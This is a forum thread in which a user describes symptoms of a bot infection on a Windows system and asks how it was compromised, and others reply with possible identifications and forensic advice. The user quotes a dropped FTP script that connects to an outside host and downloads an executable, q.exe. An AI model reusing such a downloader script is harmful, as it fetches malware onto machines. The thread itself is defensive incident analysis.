I've got a system that I know is infected with some type of bot but can't identify specifically which one. Symptoms are as follows
1) A file called C\Program Files\Symantec Antivirus\mime.txt exists on my system with the following contents
Open fjht.3322.org
644
644
get q.exe
bye
2) When the infected system is on a network with Internet connectivity, I see all kinds of ports opening outbound to an IP located in the Asia Pacific region destined for port 80. Using fport and netstat -ano shows that they map to PID 0 and user "System".
3) In #1 above, the file creation time of the mime.txt file is just before a bogus user gets added to the system per my Event Logs.
4) Finally, near that same timestamp, there is a file called C\Program Files\Symantec Antivirus\m.exe
Pretty clear the system has been owned. However, I'd like to be able to determine how this system was compromised. Any thoughts?
A Quick google found this likely suspect
Psyme Trojan
http//
Yeah…I had seen that too but never could find ANY details about how it works, how it acts, etc.. Other than the m.exe and the q.exe, there's nothing to suggest it really is Psyme.
Especially that strange mime.txt file and it's content.
> However, I'd like to be able to determine how this system
> was compromised. <
If you have shut the system down since the compromise forget it. Reformat and reinstall with latest updates. If you haven't rebooted acquire the memory from the system. It may still be possible to find the entry point. Without the memory there is no way of knowing what was done before installing your bot. Multifunction malware is common steal your credit card numbers and encryption keys and then install spyware/adware. You are seeing the end result but probably not what led to this state.
> C\Program Files\Symantec Antivirus\mime.txt<
Antivirus is a common entry point vector nowadays so maybe this is a clue. The real malware might be running inside of Symantec.